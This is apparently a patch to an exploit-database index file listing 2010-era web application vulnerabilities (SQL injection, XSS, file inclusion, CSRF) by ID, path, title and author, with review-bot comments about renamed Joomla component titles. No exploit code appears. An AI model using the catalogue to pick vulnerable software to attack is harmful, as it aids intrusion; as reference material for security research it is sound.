12823,platforms/php/webapps/12823.txt,"MusicBox - SQL Injection",2010-05-31,titanichacker,php,webapps,0
12833,platforms/asp/webapps/12833.txt,"Patient folder (THEME ASP) - SQL Injection",2010-05-31,"SA H4x0r",asp,webapps,0
12839,platforms/php/webapps/12839.txt,"Hexjector 1.0.7.2 - Persistent Cross-Site Scripting",2010-06-01,hexon,php,webapps,0
@ -23312,7 +23317,7 @@ id,file,description,date,author,platform,type,port
18594,platforms/php/webapps/18594.txt,"Simple Posting System - Multiple Vulnerabilities",2012-03-14,n0tch,php,webapps,0
14247,platforms/php/webapps/14247.txt,"Auction_Software Script - Admin Login Bypass",2010-07-06,ALTBTA,php,webapps,0
13736,platforms/php/webapps/13736.txt,"DDLCMS 2.1 - (skin) Remote File Inclusion",2010-06-06,eidelweiss,php,webapps,0
13737,platforms/php/webapps/13737.txt,"Joomla! Component 'com_djartgallery' - Multiple Vulnerabilities",2010-06-06,d0lc3,php,webapps,0
13737,platforms/php/webapps/13737.txt,"Joomla! Component DJ-ArtGallery 0.9.1 - Multiple Vulnerabilities",2010-06-06,d0lc3,php,webapps,0
13738,platforms/php/webapps/13738.txt,"PHP Director 0.2 - SQL Injection",2010-06-06,Mr.Rat,php,webapps,0
13739,platforms/php/webapps/13739.txt,"WmsCMS - Cross-Site Scripting / SQL Injection",2010-06-06,Ariko-Security,php,webapps,0
13740,platforms/php/webapps/13740.txt,"iScripts eSwap 2.0 - SQL Injection / Cross-Site Scripting",2010-06-06,Sid3^effects,php,webapps,0
@ -23556,7 +23561,7 @@ id,file,description,date,author,platform,type,port
14123,platforms/php/webapps/14123.txt,"WebDM CMS - SQL Injection",2010-06-29,"Dr.0rYX AND Cr3W-DZ",php,webapps,0
14124,platforms/php/webapps/14124.pl,"PHP-Nuke 8.0 - SQL Injection",2010-06-30,Dante90,php,webapps,0
14125,platforms/php/webapps/14125.pl,"ShopCartDx 4.30 - 'products.php' Blind SQL Injection",2010-06-30,Dante90,php,webapps,0
14126,platforms/php/webapps/14126.txt,"Joomla! Component 'com_gamesbox' 1.0.2 - 'id' SQL Injection",2010-06-30,v3n0m,php,webapps,0
14126,platforms/php/webapps/14126.txt,"Joomla! Component Gamesbox 1.0.2 - 'id' Parameter SQL Injection",2010-06-30,v3n0m,php,webapps,0
14127,platforms/php/webapps/14127.txt,"Joomla! Component 'Joomanager' - SQL Injection",2010-06-30,Sid3^effects,php,webapps,0
14141,platforms/php/webapps/14141.pl,"Oxygen2PHP 1.1.3 - 'member.php' SQL Injection",2010-06-30,Dante90,php,webapps,0
14132,platforms/php/webapps/14132.html,"webERP 3.11.4 - Multiple Vulnerabilities",2010-06-30,"ADEO Security",php,webapps,0
@ -23587,7 +23592,7 @@ id,file,description,date,author,platform,type,port
14192,platforms/asp/webapps/14192.txt,"Ziggurat Farsi CMS - SQL Injection",2010-07-03,"Arash Saadatfar",asp,webapps,0
14184,platforms/php/webapps/14184.txt,"SweetRice < 0.6.4 - 'FCKeditor' Arbitrary File Upload",2010-07-03,ITSecTeam,php,webapps,0
14186,platforms/php/webapps/14186.txt,"Family Connections Who is Chatting AddOn - Remote File Inclusion",2010-07-03,lumut--,php,webapps,0
14187,platforms/php/webapps/14187.txt,"Joomla! Component 'com_eventcal' 1.6.4 - Blind SQL Injection",2010-07-03,RoAd_KiLlEr,php,webapps,0
14187,platforms/php/webapps/14187.txt,"Joomla! Component eventCal 1.6.4 - Blind SQL Injection",2010-07-03,RoAd_KiLlEr,php,webapps,0
14188,platforms/php/webapps/14188.html,"Cpanel 11.25 - Cross-Site Request Forgery (Add FTP Account)",2010-07-03,G0D-F4Th3r,php,webapps,0
14193,platforms/php/webapps/14193.c,"iscripts Socialware 2.2.x - Multiple Vulnerabilities",2010-07-03,"Salvatore Fresta",php,webapps,0
14208,platforms/php/webapps/14208.txt,"Sandbox 2.0.2 - Local File Inclusion",2010-07-04,saudi0hacker,php,webapps,0
@ -23603,11 +23608,11 @@ id,file,description,date,author,platform,type,port
14206,platforms/php/webapps/14206.txt,"Esoftpro Online Contact Manager - Multiple Vulnerabilities",2010-07-04,"L0rd CrusAd3r",php,webapps,0
14207,platforms/php/webapps/14207.txt,"Joomla! Component 'com_phocagallery' - SQL Injection",2010-07-04,RoAd_KiLlEr,php,webapps,0
14210,platforms/php/webapps/14210.txt,"Joomla! Component Address Book - Blind SQL Injection",2010-07-04,Sid3^effects,php,webapps,0
14211,platforms/php/webapps/14211.txt,"Joomla! Component 'com_ninjamonials' - Blind SQL Injection",2010-07-04,Sid3^effects,php,webapps,0
14211,platforms/php/webapps/14211.txt,"Joomla! Component NinjaMonials - Blind SQL Injection",2010-07-04,Sid3^effects,php,webapps,0
14213,platforms/php/webapps/14213.txt,"Joomla! Component 'com_sef' - Local File Inclusion",2010-07-05,_mlk_,php,webapps,0
14214,platforms/php/webapps/14214.txt,"bbPress 1.0.2 - Cross-Site Request Forgery (Change Admin Password)",2010-07-05,saudi0hacker,php,webapps,0
14217,platforms/php/webapps/14217.txt,"WikiWebHelp 0.28 - SQL Injection",2010-07-05,"ADEO Security",php,webapps,0
14250,platforms/php/webapps/14250.txt,"Joomla! Component 'com_neorecruit' - 'Itemid' Parameter Blind SQL Injection",2010-07-06,Sid3^effects,php,webapps,0
14250,platforms/php/webapps/14250.txt,"Joomla! Component NeoRecruit 1.6.4 - 'Itemid' Parameter Blind SQL Injection",2010-07-06,Sid3^effects,php,webapps,0
14223,platforms/php/webapps/14223.txt,"Bs Scripts_Directory - SQL Injection / Authentication Bypass",2010-07-05,Sid3^effects,php,webapps,0
14224,platforms/php/webapps/14224.txt,"Bs Recipes_Website Script - SQL Injection / Authentication Bypass",2010-07-05,Sid3^effects,php,webapps,0
14225,platforms/php/webapps/14225.txt,"Bs Realtor_Web Script - SQL Injection",2010-07-05,Sid3^effects,php,webapps,0
@ -23731,8 +23736,8 @@ id,file,description,date,author,platform,type,port
14444,platforms/php/webapps/14444.txt,"ZeeNetworking 1x - Arbitrary File Upload",2010-07-23,SONIC,php,webapps,0
14445,platforms/php/webapps/14445.txt,"ZeeMatri 3.x - Arbitrary File Upload",2010-07-23,SONIC,php,webapps,0
14446,platforms/php/webapps/14446.txt,"PhotoPost - PHP SQL Injection",2010-07-23,Cyber-sec,php,webapps,0
14448,platforms/php/webapps/14448.txt,"Joomla! Component 'com_golfcourseguide' 0.9.6.0 - SQL Injection",2010-07-23,Valentin,php,webapps,0
14449,platforms/php/webapps/14449.txt,"Joomla! Component 'com_huruhelpdesk' - SQL Injection",2010-07-23,Amine_92,php,webapps,0
14448,platforms/php/webapps/14448.txt,"Joomla! Component Golf Course Guide 0.9.6.0 - SQL Injection",2010-07-23,Valentin,php,webapps,0
14449,platforms/php/webapps/14449.txt,"Joomla! Component Huru Helpdesk - SQL Injection",2010-07-23,Amine_92,php,webapps,0
14450,platforms/php/webapps/14450.txt,"Joomla! Component 'com_iproperty' - SQL Injection",2010-07-23,Amine_92,php,webapps,0
14453,platforms/php/webapps/14453.txt,"PhotoPost PHP 4.6.5 - (ecard.php) SQL Injection",2010-07-23,CoBRa_21,php,webapps,0
14454,platforms/php/webapps/14454.txt,"ValidForm Builder script - Remote Command Execution",2010-07-23,"HaCkEr arar",php,webapps,0
@ -23744,7 +23749,7 @@ id,file,description,date,author,platform,type,port
14462,platforms/php/webapps/14462.txt,"Joomla! Component 'com_oziogallery' - SQL Injection",2010-07-24,"ViRuS Qalaa",php,webapps,0
14463,platforms/php/webapps/14463.txt,"Joomla! Component 'com_itarmory' - SQL Injection",2010-07-24,Craw,php,webapps,0
14465,platforms/php/webapps/14465.txt,"sNews 1.7 - (index.php?category) SQL Injection",2010-07-24,CoBRa_21,php,webapps,0
14466,platforms/php/webapps/14466.txt,"Joomla! Component 'com_joomdle' 0.24 - SQL Injection",2010-07-24,kaMtiEz,php,webapps,0
14466,platforms/php/webapps/14466.txt,"Joomla! Component Joomdle 0.24 - SQL Injection",2010-07-24,kaMtiEz,php,webapps,0
14467,platforms/php/webapps/14467.txt,"Joomla! Component 'com_youtube' - SQL Injection",2010-07-24,Forza-Dz,php,webapps,0
14469,platforms/php/webapps/14469.txt,"XAOS CMS - SQL Injection",2010-07-25,H-SK33PY,php,webapps,0
14470,platforms/php/webapps/14470.txt,"Ballettin Forum - SQL Injection",2010-07-25,3v0,php,webapps,0
@ -23752,7 +23757,7 @@ id,file,description,date,author,platform,type,port
14472,platforms/php/webapps/14472.txt,"WhiteBoard 0.1.30 - Multiple Blind SQL Injection",2010-07-25,"Salvatore Fresta",php,webapps,0
14483,platforms/php/webapps/14483.pl,"PunBB 1.3.4 / Pun_PM 1.2.6 - Blind SQL Injection",2010-07-27,Dante90,php,webapps,0
14474,platforms/php/webapps/14474.txt,"Freeway CMS 1.4.3.210 - SQL Injection",2010-07-26,**RoAd_KiLlEr**,php,webapps,0
14476,platforms/php/webapps/14476.txt,"Joomla! Component 'com_Joomla-visites' - Remote File Inclusion",2010-07-26,Li0n-PaL,php,webapps,0
14476,platforms/php/webapps/14476.txt,"Joomla! Component Visites 1.1 RC2 - Remote File Inclusion",2010-07-26,Li0n-PaL,php,webapps,0
14481,platforms/php/webapps/14481.txt,"Joomla! Component 'com_ttvideo' 1.0 - SQL Injection",2010-07-27,"Salvatore Fresta",php,webapps,0
14485,platforms/php/webapps/14485.txt,"nuBuilder 10.04.20 - Local File Inclusion",2010-07-27,"John Leitch",php,webapps,0
14488,platforms/php/webapps/14488.txt,"Joomla! Component 'com_appointinator' 1.0.1 - Multiple Vulnerabilities",2010-07-27,"Salvatore Fresta",php,webapps,0
@ -23856,7 +23861,7 @@ id,file,description,date,author,platform,type,port
14839,platforms/php/webapps/14839.txt,"GuestBookPlus - HTML Injection / Bypass Comments Limit",2010-08-29,"MiND C0re",php,webapps,0
14841,platforms/php/webapps/14841.txt,"seagull 0.6.7 - Remote File Inclusion",2010-08-30,"FoX HaCkEr",php,webapps,0
14845,platforms/php/webapps/14845.txt,"Joomla! Component 'com_picsell' - Local File Disclosure",2010-08-30,Craw,php,webapps,0
14846,platforms/php/webapps/14846.txt,"Joomla! Component 'com_jefaqpro' - Multiple Blind SQL Injection",2010-08-31,"Chip d3 bi0s",php,webapps,0
14846,platforms/php/webapps/14846.txt,"Joomla! Component JE FAQ Pro 1.5.0 - Multiple Blind SQL Injection",2010-08-31,"Chip d3 bi0s",php,webapps,0
14849,platforms/php/webapps/14849.py,"mBlogger 1.0.04 - (viewpost.php) SQL Injection",2010-08-31,"Ptrace Security",php,webapps,0
14854,platforms/php/webapps/14854.py,"Cpanel PHP - Restriction Bypass",2010-09-01,Abysssec,php,webapps,0
14851,platforms/php/webapps/14851.txt,"dompdf 0.6.0 beta1 - Remote File Inclusion",2010-09-01,Andre_Corleone,php,webapps,0
@ -23871,7 +23876,7 @@ id,file,description,date,author,platform,type,port
14891,platforms/php/webapps/14891.txt,"PHP Classifieds ADS - 'sid' Blind SQL Injection",2010-09-04,"BorN To K!LL",php,webapps,0
14893,platforms/php/webapps/14893.txt,"PHP Classifieds 7.3 - Remote File Inclusion",2010-09-04,alsa7r,php,webapps,0
14894,platforms/php/webapps/14894.py,"A-Blog 2.0 - 'sources/search.php' SQL Injection",2010-09-05,"Ptrace Security",php,webapps,0
14896,platforms/php/webapps/14896.txt,"Joomla! Component 'com_magazine' 3.0.1 - Remote File Inclusion",2010-09-05,LoSt.HaCkEr,php,webapps,0
14896,platforms/php/webapps/14896.txt,"Joomla! Component iJoomla Magazine 3.0.1 - Remote File Inclusion",2010-09-05,LoSt.HaCkEr,php,webapps,0
14897,platforms/php/webapps/14897.txt,"ChillyCMS 1.1.3 - Multiple Vulnerabilities",2010-09-05,AmnPardaz,php,webapps,0
14898,platforms/asp/webapps/14898.txt,"ifnuke - Multiple Vulnerabilities",2010-09-05,Abysssec,asp,webapps,0
14901,platforms/php/webapps/14901.txt,"Joomla! Component Clantools 1.5 - Blind SQL Injection",2010-09-05,Solidmedia,php,webapps,0
@ -23879,7 +23884,7 @@ id,file,description,date,author,platform,type,port
14913,platforms/asp/webapps/14913.txt,"DMXReady Members Area Manager - Persistent Cross-Site Scripting",2010-09-06,"L0rd CrusAd3r",asp,webapps,0
14908,platforms/asp/webapps/14908.txt,"DMXready Polling Booth Manager - SQL Injection",2010-09-05,"L0rd CrusAd3r",asp,webapps,0
14910,platforms/php/webapps/14910.txt,"Softbiz Article Directory Script - (sbiz_id) Blind SQL Injection",2010-09-05,"BorN To K!LL",php,webapps,0
14911,platforms/php/webapps/14911.sh,"Joomla! Component 'com_gantry' 3.0.10 - Blind SQL Injection",2010-09-05,jdc,php,webapps,0
14911,platforms/php/webapps/14911.sh,"Joomla! Component Gantry 3.0.10 - Blind SQL Injection",2010-09-05,jdc,php,webapps,0
14932,platforms/windows/webapps/14932.py,"ColdCalendar 2.06 - SQL Injection",2010-09-07,mr_me,windows,webapps,0
14914,platforms/asp/webapps/14914.txt,"Micronetsoft RV Dealer Website - SQL Injection",2010-09-06,"L0rd CrusAd3r",asp,webapps,0
14915,platforms/php/webapps/14915.txt,"InterPhoto Gallery - Multiple Vulnerabilities",2010-09-06,Abysssec,php,webapps,0
@ -23899,7 +23904,7 @@ id,file,description,date,author,platform,type,port
15443,platforms/php/webapps/15443.txt,"Joomla! Component 'com_forme' 1.0.5 - Multiple Vulnerabilities",2010-11-06,jdc,php,webapps,0
14960,platforms/php/webapps/14960.txt,"ES Simple Download 1.0. - Local File Inclusion",2010-09-09,Kazza,php,webapps,0
14962,platforms/multiple/webapps/14962.txt,"CS-Cart 1.3.3 - 'install.php' Cross-Site Scripting",2010-09-09,crmpays,multiple,webapps,80
14964,platforms/php/webapps/14964.txt,"Joomla! Component 'com_jphone' - Local File Inclusion",2010-09-10,"Chip d3 bi0s",php,webapps,0
14964,platforms/php/webapps/14964.txt,"Joomla! Component Jphone 1.0 Alpha 3 - Local File Inclusion",2010-09-10,"Chip d3 bi0s",php,webapps,0
14965,platforms/php/webapps/14965.txt,"fcms 2.2.3 - Remote File Inclusion",2010-09-10,LoSt.HaCkEr,php,webapps,0
14968,platforms/php/webapps/14968.txt,"symphony 2.0.7 - Multiple Vulnerabilities",2010-09-10,JosS,php,webapps,0
14969,platforms/asp/webapps/14969.txt,"ASP Nuke - SQL Injection",2010-09-11,Abysssec,asp,webapps,0
@ -23914,7 +23919,7 @@ id,file,description,date,author,platform,type,port
14995,platforms/php/webapps/14995.txt,"Joomla! Component 'com_mtree' 2.1.5 - Arbitrary File Upload",2010-09-13,jdc,php,webapps,0
14996,platforms/php/webapps/14996.txt,"Storyteller CMS - (var) Local File Inclusion",2010-09-13,"BorN To K!LL",php,webapps,0
14997,platforms/php/webapps/14997.txt,"UCenter Home 2.0 - SQL Injection",2010-09-13,KnocKout,php,webapps,0
14998,platforms/php/webapps/14998.txt,"Joomla! Component 'com_jgen' - SQL Injection",2010-09-14,**RoAd_KiLlEr**,php,webapps,0
14998,platforms/php/webapps/14998.txt,"Joomla! Component JGen 0.9.33 - SQL Injection",2010-09-14,**RoAd_KiLlEr**,php,webapps,0
14999,platforms/asp/webapps/14999.txt,"freediscussionforums 1.0 - Multiple Vulnerabilities",2010-09-14,Abysssec,asp,webapps,0
15004,platforms/php/webapps/15004.pl,"E-Xoopport - Samsara 3.1 (Sections Module) - Blind SQL Injection",2010-09-14,_mRkZ_,php,webapps,0
15006,platforms/php/webapps/15006.txt,"eNdonesia 8.4 - SQL Injection",2010-09-15,vYc0d,php,webapps,0
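Review bot: Row 14998 is being rewritten but its author field still carries literal asterisks (`**RoAd_KiLlEr**`), while other rows by this author in the file (14187, 14207) use plain RoAd_KiLlEr. Since the line is touched anyway, normalize the author here so that an author search returns all of the entries; 14474 has the same issue.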
@ -23942,7 +23947,7 @@ id,file,description,date,author,platform,type,port
15080,platforms/php/webapps/15080.txt,"Skybluecanvas 1.1-r248 - Cross-Site Request Forgery",2010-09-22,Sweet,php,webapps,0
15082,platforms/php/webapps/15082.txt,"BSI Hotel Booking System Admin 1.4/2.0 - Login Bypass",2010-09-22,K-159,php,webapps,0
15084,platforms/php/webapps/15084.txt,"Joomla! Component 'com_timetrack' 1.2.4 - Multiple SQL Injection",2010-09-22,"Salvatore Fresta",php,webapps,0
15085,platforms/php/webapps/15085.txt,"Joomla! Component 'com_ezautos' - SQL Injection",2010-09-22,Gamoscu,php,webapps,0
15085,platforms/php/webapps/15085.txt,"Joomla! Component Joostina - SQL Injection",2010-09-22,Gamoscu,php,webapps,0
15090,platforms/php/webapps/15090.txt,"WAnewsletter 2.1.2 - SQL Injection",2010-09-23,BrOx-Dz,php,webapps,0
15091,platforms/php/webapps/15091.txt,"GeekLog 1.3.8 (filemgmt) - SQL Injection",2010-09-23,Gamoscu,php,webapps,0
15092,platforms/php/webapps/15092.txt,"OvBB 0.16a - Multiple Local File Inclusion",2010-09-23,cOndemned,php,webapps,0
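Review bot: The new title for 15085 changes 'com_ezautos' to "Joostina", which does not correspond to the old identifier and, unlike most renames in this patch, adds no version. Please confirm the name against 15085.txt; if the affected component is still `com_ezautos`, the identifier should stay in the description.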
@ -23951,7 +23956,7 @@ id,file,description,date,author,platform,type,port
15114,platforms/php/webapps/15114.php,"ZenPhoto - Config Update / Command Execution",2010-09-26,Abysssec,php,webapps,0
15102,platforms/win_x86/webapps/15102.txt,"Traidnt UP - Cross-Site Request Forgery (Add Admin)",2010-09-24,"John Johnz",win_x86,webapps,80
15106,platforms/asp/webapps/15106.txt,"VisualSite CMS 1.3 - Multiple Vulnerabilities",2010-09-25,Abysssec,asp,webapps,0
15157,platforms/php/webapps/15157.txt,"Joomla! Component 'com_jeguestbook' 1.0 - Multiple Vulnerabilities",2010-09-30,"Salvatore Fresta",php,webapps,0
15157,platforms/php/webapps/15157.txt,"Joomla! Component JE Guestbook 1.0 - Multiple Vulnerabilities",2010-09-30,"Salvatore Fresta",php,webapps,0
15118,platforms/asp/webapps/15118.txt,"gokhun asp stok 1.0 - Multiple Vulnerabilities",2010-09-26,KnocKout,asp,webapps,0
15119,platforms/php/webapps/15119.txt,"PEEL Premium 5.71 - SQL Injection",2010-09-26,KnocKout,php,webapps,0
15110,platforms/php/webapps/15110.txt,"E-Xoopport - Samsara 3.1 (eCal Module) - Blind SQL Injection",2010-09-25,_mRkZ_,php,webapps,0
@ -23976,7 +23981,7 @@ id,file,description,date,author,platform,type,port
15154,platforms/php/webapps/15154.txt,"MyPhpAuction 2010 - 'id' Parameter SQL Injection",2010-09-29,"BorN To K!LL",php,webapps,0
15160,platforms/asp/webapps/15160.txt,"ASPMass Shopping Cart - Arbitrary File Upload / Cross-Site Request Forgery",2010-09-30,Abysssec,asp,webapps,0
15162,platforms/php/webapps/15162.rb,"Joomla! Component 'com_jejob' - SQL Injection",2010-09-30,"Easy Laster",php,webapps,0
15163,platforms/php/webapps/15163.rb,"Joomla! Component 'com_jedirectory' - SQL Injection",2010-09-30,"Easy Laster",php,webapps,0
15163,platforms/php/webapps/15163.rb,"Joomla! Component JE Directory 1.0 - SQL Injection",2010-09-30,"Easy Laster",php,webapps,0
15164,platforms/php/webapps/15164.txt,"JomSocial 1.8.8 - Arbitrary File Upload",2010-09-30,"Jeff Channell",php,webapps,0
15165,platforms/php/webapps/15165.txt,"zen cart 1.3.9f - Multiple Vulnerabilities",2010-10-01,LiquidWorm,php,webapps,0
15166,platforms/php/webapps/15166.txt,"Zen Cart 1.3.9f (typefilter) - Local File Inclusion",2010-10-01,LiquidWorm,php,webapps,0
@ -24006,7 +24011,7 @@ id,file,description,date,author,platform,type,port
15220,platforms/php/webapps/15220.txt,"Flex Timesheet - Authentication Bypass",2010-10-08,KnocKout,php,webapps,0
15222,platforms/php/webapps/15222.txt,"Joomla! Component Community Builder Enhanced (CBE) 1.4.8/1.4.9/1.4.10 - Local File Inclusion / Remote Code Execution",2010-10-09,"Delf Tonder",php,webapps,0
15223,platforms/php/webapps/15223.txt,"Chipmunk Pwngame - Multiple SQL Injections",2010-10-09,KnocKout,php,webapps,0
15224,platforms/php/webapps/15224.txt,"Joomla! Component 'com_jscalendar' 1.5.1 - Multiple Vulnerabilities",2010-10-09,"Salvatore Fresta",php,webapps,0
15224,platforms/php/webapps/15224.txt,"Joomla! Component JS Calendar 1.5.1 - Multiple Vulnerabilities",2010-10-09,"Salvatore Fresta",php,webapps,0
15225,platforms/php/webapps/15225.txt,"VideoDB 3.0.3 - Multiple Vulnerabilities",2010-10-09,Valentin,php,webapps,0
15268,platforms/php/webapps/15268.txt,"WikiWebHelp 0.3.3 - Insecure Cookie Handling",2010-10-17,FuRty,php,webapps,0
39571,platforms/php/webapps/39571.txt,"ZenPhoto 1.4.11 - Remote File Inclusion",2016-03-17,"Curesec Research Team",php,webapps,80
@ -24035,7 +24040,7 @@ id,file,description,date,author,platform,type,port
15608,platforms/php/webapps/15608.txt,"Free Simple Software - SQL Injection",2010-11-24,"Mark Stanislav",php,webapps,0
15254,platforms/php/webapps/15254.txt,"KCFinder 2.2 - Arbitrary File Upload",2010-10-15,saudi0hacker,php,webapps,0
15270,platforms/asp/webapps/15270.txt,"Kisisel Radyo Script - Multiple Vulnerabilities",2010-10-17,FuRty,asp,webapps,0
15610,platforms/php/webapps/15610.txt,"Joomla! Component 'com_jeajaxeventcalendar' - SQL Injection",2010-11-25,ALTBTA,php,webapps,0
15610,platforms/php/webapps/15610.txt,"Joomla! Component JE Ajax Event Calendar - SQL Injection",2010-11-25,ALTBTA,php,webapps,0
15280,platforms/php/webapps/15280.html,"Travel Portal Script Admin Password Change - Cross-Site Request Forgery",2010-10-19,KnocKout,php,webapps,0
15276,platforms/php/webapps/15276.txt,"411cc - Multiple SQL Injections",2010-10-18,KnocKout,php,webapps,0
15277,platforms/php/webapps/15277.txt,"GeekLog 1.7.0 - 'FCKeditor' Arbitrary File Upload",2010-10-18,"Kubanezi AHG",php,webapps,0
@ -24074,7 +24079,7 @@ id,file,description,date,author,platform,type,port
15355,platforms/php/webapps/15355.txt,"Simpli Easy (AFC Simple) NewsLetter 4.2 - Cross-Site Scripting / Information Leakage",2010-10-30,p0deje,php,webapps,0
15360,platforms/php/webapps/15360.pl,"MetInfo 2.0 - PHP Code Injection",2010-10-31,Beach,php,webapps,0
15361,platforms/php/webapps/15361.pl,"MetInfo 3.0 - PHP Code Injection",2010-10-31,Beach,php,webapps,0
15366,platforms/php/webapps/15366.txt,"Joomla! Component 'com_flipwall' - SQL Injection",2010-10-31,FL0RiX,php,webapps,0
15366,platforms/php/webapps/15366.txt,"Joomla! Component Pulse Infotech Flip Wall - SQL Injection",2010-10-31,FL0RiX,php,webapps,0
15367,platforms/php/webapps/15367.txt,"Joomla! Component 'com_sponsorwall' - SQL Injection",2010-10-31,FL0RiX,php,webapps,0
15369,platforms/php/webapps/15369.php,"Auto CMS 1.8 - Remote Code Execution",2010-10-31,"Giuseppe D'Inverno",php,webapps,0
15370,platforms/php/webapps/15370.txt,"XAMPP 1.7.3 - Multiple Vulnerabilities",2010-11-01,TheLeader,php,webapps,0
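Review bot: 15366 is retitled from 'com_flipwall' to "Pulse Infotech Flip Wall" while 15367 directly below it keeps 'com_sponsorwall', although both rows share the author, the date and the SQL Injection class. Either rename both or leave both, so that the two entries stay findable with the same query.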
@ -24116,7 +24121,7 @@ id,file,description,date,author,platform,type,port
15496,platforms/php/webapps/15496.txt,"Metinfo 3.0 - Multiple Vulnerabilities",2010-11-12,anT!-Tr0J4n,php,webapps,0
15459,platforms/php/webapps/15459.txt,"Seo Panel 2.1.0 - Critical File Disclosure",2010-11-08,MaXe,php,webapps,0
15460,platforms/php/webapps/15460.txt,"Joomla! Component 'com_pro_desk' 1.5 - Local File Inclusion",2010-11-08,d3v1l,php,webapps,0
15466,platforms/php/webapps/15466.txt,"Joomla! Component 'com_jquarks4s' 1.0.0 - Blind SQL Injection",2010-11-09,"Salvatore Fresta",php,webapps,0
15466,platforms/php/webapps/15466.txt,"Joomla! Component JQuarks4s 1.0.0 - Blind SQL Injection",2010-11-09,"Salvatore Fresta",php,webapps,0
15465,platforms/php/webapps/15465.rb,"Woltlab Burning Board Userlocator 2.5 - SQL Injection",2010-11-09,"Easy Laster",php,webapps,0
15468,platforms/php/webapps/15468.txt,"Joomla! Component 'btg_oglas' - HTML / Cross-Site Scripting Injection",2010-11-09,CoBRa_21,php,webapps,0
15469,platforms/php/webapps/15469.txt,"Joomla! Component 'com_markt' - SQL Injection",2010-11-09,CoBRa_21,php,webapps,0
@ -24130,8 +24135,8 @@ id,file,description,date,author,platform,type,port
15492,platforms/php/webapps/15492.php,"E-Xoopport 3.1 - eCal display.php (katid) SQL Injection",2010-11-11,"Vis Intelligendi",php,webapps,0
15497,platforms/asp/webapps/15497.txt,"ASPilot Pilot Cart 7.3 - 'newsroom.asp' SQL Injection",2010-11-12,Daikin,asp,webapps,0
15500,platforms/php/webapps/15500.txt,"Woltlab Burning Board 2.3.4 - File Disclosure",2010-11-12,sfx,php,webapps,0
15501,platforms/php/webapps/15501.txt,"Joomla! Component 'com_jsupport' - Cross-Site Scripting",2010-11-12,Valentin,php,webapps,0
15502,platforms/php/webapps/15502.txt,"Joomla! Component 'com_jsupport' - SQL Injection",2010-11-12,Valentin,php,webapps,0
15501,platforms/php/webapps/15501.txt,"Joomla! Component JSupport 1.5.6 - Cross-Site Scripting",2010-11-12,Valentin,php,webapps,0
15502,platforms/php/webapps/15502.txt,"Joomla! Component JSupport 1.5.6 - SQL Injection",2010-11-12,Valentin,php,webapps,0
15506,platforms/hardware/webapps/15506.txt,"Camtron CMNC-200 IP Camera - Authentication Bypass",2010-11-13,"Trustwave's SpiderLabs",hardware,webapps,0
15507,platforms/hardware/webapps/15507.txt,"Camtron CMNC-200 IP Camera - Undocumented Default Accounts",2010-11-13,"Trustwave's SpiderLabs",hardware,webapps,0
15509,platforms/php/webapps/15509.txt,"Build a Niche Store 3.0 - (BANS) Authentication Bypass",2010-11-13,"ThunDEr HeaD",php,webapps,0
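Review bot: the new 15501 and 15502 titles replace 'com_jsupport' with "JSupport 1.5.6", which removes the component identifier and introduces a version number the old rows did not carry. Consider keeping the identifier somewhere in the description, for example "JSupport 1.5.6 ('com_jsupport')", so that searches of the CSV by component name still match, and check that 1.5.6 is the version stated in both advisory files.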
@ -24172,7 +24177,7 @@ id,file,description,date,author,platform,type,port
15574,platforms/php/webapps/15574.txt,"Arabian YouTube Script - Blind SQL Injection",2010-11-19,R3d-D3V!L,php,webapps,0
15577,platforms/php/webapps/15577.html,"Plogger Gallery 1.0 - Cross-Site Request Forgery (Change Admin Password)",2010-11-19,Or4nG.M4N,php,webapps,0
15578,platforms/php/webapps/15578.txt,"DVD Rental Software - SQL Injection",2010-11-19,JaMbA,php,webapps,0
15585,platforms/php/webapps/15585.txt,"Joomla! Component 'com_jimtawl' - Local File Inclusion",2010-11-20,Mask_magicianz,php,webapps,0
15585,platforms/php/webapps/15585.txt,"Joomla! Component Jimtawl 1.0.2 - Local File Inclusion",2010-11-20,Mask_magicianz,php,webapps,0
16087,platforms/php/webapps/16087.txt,"PMB Services 3.4.3 - SQL Injection",2011-02-01,Luchador,php,webapps,0
15588,platforms/php/webapps/15588.txt,"S_CMS 2.5 - Multiple Vulnerabilities",2010-11-20,LordTittiS,php,webapps,0
15590,platforms/php/webapps/15590.txt,"vBulletin 4.0.8 PL1 - Cross-Site Scripting Filter Bypass within Profile Customization",2010-11-20,MaXe,php,webapps,0
@ -24224,14 +24229,14 @@ id,file,description,date,author,platform,type,port
15688,platforms/asp/webapps/15688.txt,"HotWebScripts HotWeb Rentals - 'resorts.asp' SQL Injection",2010-12-05,R4dc0re,asp,webapps,0
15690,platforms/asp/webapps/15690.txt,"SOOP Portal 2.0 - Arbitrary File Upload",2010-12-05,Net.Edit0r,asp,webapps,0
15691,platforms/php/webapps/15691.txt,"Pulse CMS Basic - Local File Inclusion",2010-12-05,"Mark Stanislav",php,webapps,0
15699,platforms/php/webapps/15699.txt,"phpMyAdmin - Client Side Code Injection / Redirect Link Falsification",2010-12-06,"emgent white_sheep and scox",php,webapps,80
15699,platforms/php/webapps/15699.txt,"phpMyAdmin - Client-Side Code Injection / Redirect Link Falsification",2010-12-06,"emgent white_sheep and scox",php,webapps,80
33671,platforms/php/webapps/33671.txt,"MySmartBB 1.7 - Multiple Cross-Site Scripting Vulnerabilities",2010-02-24,indoushka,php,webapps,0
15701,platforms/php/webapps/15701.txt,"MODx REvolution CMS 2.0.4-pl2 - Cross-Site Scripting (POST Injection)",2010-12-06,LiquidWorm,php,webapps,0
15703,platforms/asp/webapps/15703.txt,"SOOP Portal Raven 1.0b - Arbitrary File Upload",2010-12-07,"Sun Army",asp,webapps,0
15744,platforms/cgi/webapps/15744.txt,"Gitweb 1.7.3.3 - Cross-Site Scripting",2010-12-15,emgent,cgi,webapps,80
15710,platforms/multiple/webapps/15710.txt,"Apache Archiva 1.0 < 1.3.1 - Cross-Site Request Forgery",2010-12-09,"Anatolia Security",multiple,webapps,0
15711,platforms/php/webapps/15711.pl,"Abtp Portal Project 0.1.0 - Local File Inclusion",2010-12-09,Br0ly,php,webapps,0
15714,platforms/php/webapps/15714.txt,"Joomla! Component 'com_jeauto' 1.0 - SQL Injection",2010-12-09,"Salvatore Fresta",php,webapps,0
15714,platforms/php/webapps/15714.txt,"Joomla! Component JE Auto 1.0 - SQL Injection",2010-12-09,"Salvatore Fresta",php,webapps,0
15715,platforms/php/webapps/15715.txt,"CMScout 2.09 - Cross-Site Request Forgery",2010-12-09,"High-Tech Bridge SA",php,webapps,0
15720,platforms/php/webapps/15720.txt,"Sulata iSoft - 'stream.php' Local File Disclosure",2010-12-10,Sudden_death,php,webapps,0
